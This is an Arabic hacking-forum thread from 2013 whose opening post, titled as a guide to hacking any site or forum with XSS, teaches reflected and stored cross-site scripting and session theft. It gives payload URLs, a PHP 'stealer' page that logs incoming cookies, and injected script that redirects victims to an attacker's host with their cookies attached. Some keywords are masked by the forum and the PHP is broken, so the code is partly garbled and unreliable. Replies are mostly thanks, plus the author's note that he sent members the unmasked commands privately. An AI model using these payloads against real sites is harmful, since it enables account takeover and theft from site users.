:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   اخترق اي موقع او منتدى مع ثغرة ( xss ) (http://www.vbspiders.com/vb/t68071.html)

Saad Ghamdi 08-02-2013 07:34 PM

اخترق اي موقع او منتدى مع ثغرة ( xss )
 
بسم الله الرحمن الرحيم

اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...

ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره

ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :
  • javascript
  • HTML
  • PHP

اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص

كود PHP:

www.infectedsite.com/search.php?q=word 

يكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :

http://www.infectedsite.com/search.php?q=***************("XSS")</script>word

ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )


لماذا يكون الموقع مصابا بثغرة ( xss )

السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :
كود PHP:

 #@$%^,.<> 

وذلك لمنع إدخال الأكواد التالية :
  • javascript
  • HTML
  • PHP

هناك نوعين من ثغرات (xss )


( 1 ) اول نوع وهو النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :


كود PHP:

 ***************("XSS")</script> 

سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

( 2 ) النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث كالتالي :

كود PHP:

http://www.infectedsite.com/search.php?q=***************("XSS")</script>word 

كيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :

كود PHP:

 stealer.php 

تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة ( GET ) الكود :

كود:

<?php
 $data=$_GET["c"]
 $f=open("*******.tct","w")
 $f.write($data)
 $f.close()
 ?>


هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :

كود PHP:

http://www.infectedsite.com/search.php?q=******************.location("http://ypursite.com/stealer.php?c="+********.******);</script> 

هنا دمجنا السكريبت :

كود PHP:

 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 

هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :

كود:

******** . ******
هنا اذا فتحنا الملف

كود:

http://yoursite.com/*******.txt
ستجد الككيز للمستخدم مكتوبة فيها

اما في الثغرات الدائمة فيكفي ادخال الكود التالي :
كود PHP:

 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 

وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :

كود PHP:

 ********.location 




هذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية

عنكبوت مبدع خطير 08-06-2013 02:17 AM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
Mirce

Saad Ghamdi 08-07-2013 06:02 AM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
اقتباس:

المشاركة الأصلية كتبت بواسطة عنكبوت مبدع خطير (المشاركة 466399)
Mirce


اهلا وسهلا اخوي ومنور المتصفح ..


كود:

ملاحظة
حبيت من الإدارة لو تعطيني صلاحية التعديل على المواضيع عشان اضيف ( الأوامر اللتي قامت حماية المنتدى بتشفيرها ) في ملف ورفعه على رابط ليستفيد الأعضاء من الدرس ...

شاكر لكم حسن المتابعة ..

Spider_king 08-07-2013 09:14 AM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
MERCII

MaFia 08-07-2013 03:13 PM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
بارك الله فيك اخي واتمنى ان ترسل الموضوع في txt واقوم بالتعديل عليه
للحماية من الكلمات المشفره
في الموضوع

وكل عام والامه العربيه بخير ان شاء الله:icon26:

Saad Ghamdi 08-07-2013 08:00 PM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Cyber Mafia (المشاركة 466483)
بارك الله فيك اخي واتمنى ان ترسل الموضوع في txt واقوم بالتعديل عليه
للحماية من الكلمات المشفره
في الموضوع

وكل عام والامه العربيه بخير ان شاء الله:icon26:


شاكر لك اهتمامك وردك على الموضوع + يوجد موضوع في قسم الإشراف لو تمر عليه اكون ممتن لك

تم ارسال ملف ( text ) على البروفيال الخاص فيك بالاوامر اللتي قامت حماية المنتدى بتشفيرها ...

ahmedaljubory 08-25-2013 03:55 PM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
شكرا للشرح

جبروت هكر 02-19-2014 06:36 PM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
بارك الله فيك..

واصل ابداعك 😎

InJuries Yemen 02-27-2014 11:13 PM

رد: اخترق اي موقع او منتدى مع ثغرة ( xss )
 
يسسلمو يا بطل


الساعة الآن 05:59 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0